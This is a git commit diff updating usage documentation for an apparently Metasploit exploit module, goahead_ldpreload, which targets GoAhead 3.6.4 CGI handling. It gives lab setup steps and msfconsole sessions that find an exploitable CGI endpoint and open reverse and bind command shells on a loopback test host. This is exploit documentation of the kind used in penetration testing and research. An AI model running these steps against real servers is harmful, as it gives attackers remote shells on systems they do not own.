Documentation update
This commit is contained in:
HD Moore
@@ -16,7 +16,7 @@ git checkout tags/v3.6.4 -q
|
||||
make > /dev/null
|
||||
cd test
|
||||
gcc ./cgitest.c -o cgi-bin/cgitest
|
||||
sudo ../build/linux-x64-default/bin/goahead
|
||||
../build/linux-x64-default/bin/goahead . 127.1.1.1:8080
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
@@ -25,7 +25,7 @@ sudo ../build/linux-x64-default/bin/goahead
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/linux/http/goahead_cgi_exec```
|
||||
3. Do: ```use exploit/linux/http/goahead_ldpreload```
|
||||
4. Do: ```set rhost [ip]```
|
||||
5. Do: ```exploit```
|
||||
6. You should get a shell.
|
||||
@@ -41,21 +41,76 @@ sudo ../build/linux-x64-default/bin/goahead
|
||||
### GoAhead 3.6.4 on Ubuntu 16.04 x64
|
||||
|
||||
```
|
||||
[*] Processing goahead.rc for ERB directives.
|
||||
resource (goahead.rc)> use exploit/linux/http/goahead_cgi_exec
|
||||
resource (goahead.rc)> set verbose true
|
||||
verbose => true
|
||||
resource (goahead.rc)> set rhost 127.1.1.1
|
||||
rhost => 127.1.1.1
|
||||
resource (goahead.rc)> check
|
||||
<TBD>
|
||||
resource (goahead.rc)> exploit
|
||||
[*] Started reverse TCP handler on 127.1.1.1:4444
|
||||
[*] Sending Exploit to /cgi-bin/cgitest
|
||||
[*] Command shell session 1 opened (127.1.1.1:4444 -> 127.1.1.1:45762) at 2017-12-23 17:12:39 -0500
|
||||
uname -a
|
||||
Linux goahead 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
|
||||
|
||||
whoami
|
||||
root
|
||||
msf> use exploit/linux/http/goahead_preload
|
||||
msf exploit(goahead_ldpreload) > set RHOST 127.1.1.1
|
||||
msf exploit(goahead_ldpreload) > set RPORT 8080
|
||||
msf exploit(goahead_ldpreload) > check
|
||||
|
||||
[*] Searching 390 paths for an exploitable CGI endpoint...
|
||||
[+] Exploitable CGI located at /cgi-bin/cgitest
|
||||
[+] 127.1.1.1:8080 The target is vulnerable.
|
||||
|
||||
msf exploit(goahead_ldpreload) > exploit
|
||||
|
||||
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
|
||||
[*] Started reverse TCP handler on 127.0.0.1:4444
|
||||
[*] Searching 390 paths for an exploitable CGI endpoint...
|
||||
[+] Exploitable CGI located at /cgi-bin/cgitest
|
||||
[*] Command shell session 4 opened (127.0.0.1:4444 -> 127.0.0.1:32988) at 2017-12-28 16:26:50 -0600
|
||||
|
||||
uname -a
|
||||
Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
|
||||
exit
|
||||
|
||||
msf exploit(goahead_ldpreload) > set TARGET 1
|
||||
msf exploit(goahead_ldpreload) > unset PAYLOAD
|
||||
msf exploit(goahead_ldpreload) > exploit
|
||||
|
||||
[*] Started bind handler
|
||||
[*] Searching 390 paths for an exploitable CGI endpoint...
|
||||
[+] Exploitable CGI located at /cgi-bin/cgitest
|
||||
[*] Command shell session 5 opened (127.0.0.1:30836 -> 127.1.1.1:4444) at 2017-12-28 16:28:04 -0600
|
||||
|
||||
uname -a
|
||||
Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
|
||||
exit
|
||||
|
||||
msf exploit(goahead_ldpreload) > set TARGET 2
|
||||
msf exploit(goahead_ldpreload) > unset PAYLOAD
|
||||
msf exploit(goahead_ldpreload) > exploit
|
||||
|
||||
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
|
||||
[*] Started reverse TCP double handler on 127.0.0.1:4444
|
||||
[*] Searching 390 paths for an exploitable CGI endpoint...
|
||||
[+] Exploitable CGI located at /cgi-bin/cgitest
|
||||
[*] Accepted the first client connection...
|
||||
[*] Accepted the second client connection...
|
||||
[*] Command: echo sNRXNjxWl7ic0uWw;
|
||||
[*] Writing to socket A
|
||||
[*] Writing to socket B
|
||||
[*] Reading from sockets...
|
||||
[*] Reading from socket B
|
||||
[*] B: "sNRXNjxWl7ic0uWw\r\n"
|
||||
[*] Matching...
|
||||
[*] A is input...
|
||||
[*] Command shell session 6 opened (127.0.0.1:4444 -> 127.0.0.1:32995) at 2017-12-28 16:28:56 -0600
|
||||
|
||||
uname -a
|
||||
Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
|
||||
|
||||
|
||||
msf exploit(goahead_ldpreload) > set TARGET 4
|
||||
msf exploit(goahead_ldpreload) > unset PAYLOAD
|
||||
msf exploit(goahead_ldpreload) > exploit
|
||||
|
||||
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
|
||||
[*] Started reverse TCP handler on 127.0.0.1:4444
|
||||
[*] Searching 390 paths for an exploitable CGI endpoint...
|
||||
[+] Exploitable CGI located at /cgi-bin/cgitest
|
||||
[*] Command shell session 7 opened (127.0.0.1:4444 -> 127.0.0.1:33000) at 2017-12-28 16:29:34 -0600
|
||||
|
||||
uname -a
|
||||
Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
|
||||
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user